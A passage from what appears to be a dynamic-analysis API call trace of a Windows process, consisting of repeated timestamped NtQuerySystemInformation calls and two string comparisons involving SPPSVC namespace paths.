Length=0x0, ResultLength=0x0) [0239.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0239.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7a0, Length=0x20, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7a0, Length=0x20, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7a0, Length=0x20, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0239.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7a0, Length=0x20, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7a0, Length=0x20, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7a0, Length=0x20, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.341] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e920, Length=0x20, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.354] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 